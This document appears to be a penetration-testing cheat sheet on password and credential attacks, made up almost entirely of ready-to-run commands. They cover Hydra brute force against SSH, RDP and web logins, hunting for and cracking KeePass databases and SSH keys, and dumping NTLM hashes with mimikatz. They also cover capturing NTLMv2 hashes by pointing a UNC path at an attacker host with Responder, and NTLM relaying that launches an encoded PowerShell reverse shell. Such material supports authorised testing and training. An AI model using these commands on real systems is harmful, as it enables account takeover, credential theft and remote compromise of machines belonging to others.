Username / Password attacks
Identify the hash
You can identify the hash with tools such as:
hash-identifier
hashid <hash>Get hash type
hashcat --help | grep -i "<INPUT>"Password list generation
If you have part of password you can generate it's variations using crunch.
You have to specify minimum length, maximum length and pattern.
% = additional generated letter
crunch 6 6 -t <any_word>%%% > wordlistRegular Brute-Force
After choosing the wordlist we can move on to the Hydra tool which will help us in performing the attack.
SSH
Password Brute Force:
hydra -l <USERNAME> -P wordlist <IP> -t 4 ssh -VRDP
Username Brute-Force:
hydra -L /usr/share/wordlists/dirb/others/names.txt -p "<PASSWORD>" rdp://<IP>HTTP
Password Brute-Force [POST]:
hydra -l user -P /usr/share/wordlists/rockyou.txt <IP> http-post-form "/index.php:<USERNAME_PARAM>=user&<PWD_PARAM>=^PASS^:<FAILED_LOGIN_IDENTYFIER>"Password Managers
Search for password managers in windows apps. Once you will identify password manager on the system search for password's manager database file.
KeePass example:
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinueAlso look for configuration files:
Get-ChildItem -Path C:\<APP_PATH> -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinueTransforming the hash into a format our cracking tool can use
keepass2john <file>.kdbx > <file>.hashThen we can run hashcat
hashcat -m 13400 <file>.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --forceSSH Private Key
You can bruteforce private keys for ssh using John the Ripper.
Create rule:
[List.Rules:sshRules]
c $1 $3 $7 $! # replace
c $1 $3 $7 $@ # replace
c $1 $3 $7 $# # replaceAdd rule to john config:
sudo sh -c 'cat <RULE_FILE> >> /etc/john/john.conf'Transform id_rsa into hash
ssh2john id_rsa > ssh.hashAttack:
john --wordlist=<PASSWORDS_FILE> --rules=<RULE_NAME> ssh.hashRule based attack (Hashcat)
Add rule to the file with rules:
echo [rule] > <RULE_FILE>Show attack preview in hashcat debug mode:
hashcat -r <RULE_FILE> --stdout <PASSWORD_LIST>After debug hashcat can be run:
Hashcat mode id: https://hashcat.net/wiki/doku.php?id=example_hashes
hashcat -r <rule> -m <id> <hashfile> <wordlist>NTLM
You can dump the NTLM hashes using mimikatz as Administrator when you have SeDebugPrivilege access enabled:
We can also become the SYSTEM with SeImpersonatePrivilege access in order to get access to the hashes.
First we check for SeDebugPrivilege:
privilege::debugWe are able to elevate with the following command:
token::elevateWe can extract passwords using the following:
sekurlsa::logonpasswordslsadump::samCracking
hashcat -m 1000 ntlm.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --forcePassing
Scan with NetExec / SMBExec [Pass the hash]:
Connecting to the server [Connection]:
Useful commandsNTLMv2
You can get NTLMv2 hashes with responder when the target server reaches to us:
sudo responder -I <NETWORK_CARD>Grab it with this command:
dir \\<ATTACKER_IP>\testOr using file upload:
//<IP>/share/nonexistent.txt\\\\<IP>\\share\\nonexistent.txtCracking
hashcat -m 5600 <HASH_FILE> <WORDLIST> --force # for wordlist you can use: /usr/share/wordlists/rockyou.txtRelaying
impacket-ntlmrelayx --no-http-server -smb2support -t <IP> -c "powershell -enc <BASE64_REVERSE_SHELL>"MD5
Also use https://crackstation.net.
hashcat -m 0 <HASH_FILE> <WORDLIST> --force # for wordlist you can use: /usr/share/wordlists/rockyou.txtLast updated